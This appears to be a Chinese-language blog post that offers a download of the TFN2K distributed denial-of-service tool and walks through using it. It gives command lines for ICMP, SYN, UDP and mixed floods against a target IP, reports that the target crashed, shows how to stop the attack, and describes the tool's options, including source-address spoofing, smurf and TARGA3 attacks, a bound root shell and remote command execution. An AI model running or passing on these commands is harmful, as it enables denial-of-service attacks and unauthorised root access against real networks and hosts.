|
文件: |
tfn2koptimize.rar |
大小: |
27KB |
下载: |
下载 | |
先來ICMP攻擊
#./tfn -f hosts.txt -c 6 -i 192.168.111.88(十分鐘,192.168.111.88就死機了)
重啟,接著測試。。。
SYN/TCP攻擊:
#./tfn -f hosts.txt -c 5 -i 192.168.111.88 -p 80
UDP攻擊:
#./tfn -f hosts.txt -c 4 -i 192.168.111.88
ICMP/TCP/UDP輪流攻擊:
#./tfn -f hosts.txt -c 8 -i 192.168.111.88
5。攻擊結束
如果我們想停止攻擊:
#./tfn -f host.txt -c 0
實際tfn還有許多攻擊選項,大家可以再回頭看我的第一篇文章,看一下-c面的11個選項。
缺省的命令是通過殺死所有的子線程停止攻擊。命令一般用-c .
請看下面的命令行描述。 選項-i需要給命令一個值,分析目標主機字符串,這個目標主機字符串缺省用分界符@。
當使用smurf flood時,只有第一個是被攻擊主機,其余被用直接廣播。
ID 1 -反欺騙級:服務器產生的DoS攻擊總是來源虛假的源地址。通過這個命令,你可以控制IP地址的哪些部分是虛假的,哪些部分是真實的IP。
ID 2 -改變包尺寸:缺省的ICMP/8,smurf,udp攻擊缺省使用最小包。你可以通過改變每個包的有效載荷的字節增加它的大小。
ID 3 - 綁定root shell:啟動一個會話服務,然你連接一個指定端口就可以得到一個root shell。
ID 4 - UDP flood 攻擊:這個攻擊是利用這樣一個事實:每個udp包被送往一個關閉的端口,這樣就會有一個ICMP不可到達的信息返回,增加了攻擊的能力。
ID5 - SYN flood 攻擊:這個攻擊有規律的送虛假的連接請求。結果會是目標端口拒絕服務,添瞞TCP連接表,通過對不存在主機的TCP/RST響應增加攻擊潛力。
ID 6 - ICMP響應(ping)攻擊:這個攻擊發送虛假地址的ping請求,目標主機會回送相同大小的響應包。
ID 7 - SMURF 攻擊:用目標主機的地址發送ping請求以廣播擴大,這樣目標主機將得到回復一個多倍的回復。
ID 8 - MIX攻擊:按照1:1:1的關系交替的發送udp,syn,icmp包,這樣就可以對付路由器,其它包轉發設備,NIDS,sniffers等。
ID 9 -TARGA3攻擊
ID 10 - 遠程命令執行:給予單路在服務器上執行大量遠程命令的機會。更復雜的用法請看4.1節。
更多的選項請看命令行幫助。
阅读(1548) | 评论(0) | 转发(0) |